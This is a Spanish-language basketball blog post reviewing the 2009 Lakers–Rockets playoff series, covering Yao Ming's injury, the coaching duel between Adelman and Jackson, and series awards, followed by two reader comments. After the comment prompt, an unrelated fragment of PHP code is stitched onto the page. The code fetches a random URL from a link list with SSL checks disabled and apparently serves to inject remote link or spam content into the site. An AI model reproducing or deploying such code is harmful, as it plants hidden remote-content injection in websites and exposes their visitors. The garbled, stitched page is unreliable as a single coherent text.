Lakers 4 – Rockets 3: Maldición en diferido

19 de May de 2009 por TheDeerHunter

adelmanlakersEs inevitable. En Houston hacen porras para adivinar cuántos meses van a aguantar enteros sus principales figuras. Este año ya parecía que se iban a librar de la tradicional lesión de Yao. El cruel destino les tenía reservado para ahora esta “certeza”. En el peor momento, y en uno de los más dulces del jugador. Hay que recordar que a Mutombo ya lo habían perdido en primera ronda… sin mencionar a T-Mac, claro.

Indudablemente, una lesión de tal magnitud se tenía a notar en el devenir de la eliminatoria y de hecho, hubo un antes y un después tras la incidencia. Sin embargo, el efecto no ha sido exactamente el que todos podíamos esperar.

Hasta la lesión, durante los tres primeros partidos Houston se mostró como el equipo rocoso que habíamos visto en la regular. Entre el gigante Yao y el pequeño Brooks, a los Rockets les rebosa la mala baba. Artest, Scola, los pegajosos trucos defensivos de Battier, Chucky Hayes, Landry… impusieron desde el primer minuto una exigencia física y mental que maniataron el talento de los Lakers, a quienes robaron la ventaja campo. No es la primera vez que habíamos visto un recurso así contra ellos. Sin embargo, la respuesta tampoco fue la esperada. Los subcampeones sacaron por fin una buena dosis de agresividad y, a golpe de garrotazo, recuperaron su crédito en dos partidos tan serios que, por momentos, rozaron lo violento por su parte. Desde luego, muy pocos esperábamos que Lakers ganarían la partida a Houston desde la trinchera. Y en ésas tuvo lugar la lesión.

pauscolaCon la ausencia de Yao, Artest se ahogó sin una referencia interior. Esto, después haber realizado unos primeros partidos sensacionales e inteligentísimos… sin contar sus expulsiones, claro. Ha sido Adelman el que ha demostrado más inmunidad contra las inclemencias, el máximo responsable de convertir lo que debió de haber sido la gran desgracia en la esperanza y la promesa de la victoria imposible.

Quien más y quien menos veía que dos hombres de 7 pies eran demasiado para un juego interior formado por Scola y Hayes, pero quizás también una bala como Brooks era demasiado para las gastadas piernas de Fisher, los laxos sistemas defensivos de Jackson y la prepotencia general del equipo angelino. Y por ahí Adelman trató de reventar la banca.

Fueron los Rockets quienes atacaron ahora a los Lakers con sus propias armas. Brooks partía como un pastel la adormilada defensa amarilla, generando el caos y encontrando fácilmente a Battier o Scola. Intercambio de golpes baloncestísticos, agresividad, velocidad de ejecución, tiro exterior… la cabeza superdotada de un gran entrenador y la de sus paladines sobre la pista. Fue suficiente para dejarles en evidencia y golpear fuertemente su autoestima. Ya parecía que la mayoría de ellos no estaba y que no iban a estar ya más esta temporada.

kobebattierPero existe otra maldición de la que apenas nos acordamos… la maldición de Adelman contra Jackson, la del triple Horry contra su  passing game en los fabulosos Kings. Por muchas lecciones tácticas que Adelman le dé a Phil, éste siempre gana. En el partido decisivo logró llamar al amor propio de sus jugadores, colocó las cosas en su sitio y abusó dentro. Lo que tenía que pasar, pasó. Es inevitable.

PREMIOS:

MVP: Hay dos fases diferenciadas en esta eliminatoria. Durante la primera, Kobe fue fundamental en las dos victorias de L.A., con 35 puntos por partido ante la exigente defensa de Battier y Artest, 7 rebotes, 3 asistencias y 2 robos de promedio en los 3 partidos. Tras la lesión de Yao, su producción no fue tan eficaz y el jugador más valioso tenía que ser Gasol. Se demostró en el último partido, el único en el que los Lakers jugaron específicamente para él.

La Sorpresa: Sabemos que Brooks es un buen jugador, de hecho es uno de los habituales en esta sección y por ello no es tanta la sorpresa. Sin embargo, contra Fisher parecía casi “Chicho Terremoto”.

yaostreetclothesLa Decepción: Bynum al final dio la cara mínimamente, pero menuda serie más triste se ha marcado. Más decisivo ha sido el modo en el que Artest se ha diluido tras la lesión del gigante chino. Imaginábamos más batalla por parte de Ron-Ron. Al final apenas ha llegado a repartir ni tortas.

El mayor esfuerzo en vano: No tenemos ni idea qué es lo que tiene que hacer ya Adelman para superar a Phil Jackson. Menudo gafe tiene.

Comenta

2 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Los Lakers se han esforzado lo justo, o al menos es la impresión que han dado. Decía ayer Kenny Smith que los Lakers han “despreciado a la liga”, porque cuando llegan los Playoffs tienes que dar el máximo, y que sólo por eso no cree que merezcan el título. En fin… ya lo he dicho en alguna ocasión: toda la temporada de los Lakers ha sido así, sólo han jugado al máximo ante los rivales que más han exigido y cuando realmente lo han necesitado.
    Luego está lo que comentaba Kobe al inicio de la serie. Da igual ganar 4-0 o 4-3. Lo que cuenta es ganar, y si ganas el anillo nadie se acordará. Claro, los aficionados y el equipo habría preferido un 4-0, pero ahora ya da lo mismo.

      Citar

  2. TheDeerHunter dice:
    #2

    Dará igual ganar por 4-0 o por 4-3, pero no da igual ganar jugando mal que jugando bien, y lo de ganar está por ver, por cierto… que creo que el objetivo de los Lakers este año no era pasar de segunda ronda.

    De momento lo que han hecho es jugar como el culo la mayor parte del tiempo… y nada que ver con la regular, por cierto. Algún partido les salió mal claro, pero en playoffs lo raro ha sido ver algún momento bueno…

    Yo no llego a tanto de lo de “despreciar a la liga” y demás, pero si por una de esas terminaran ganando el anillo así me parecerían un campeón de mierda. Lo peor es que ese es el mejor de los escenarios si siguen así…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>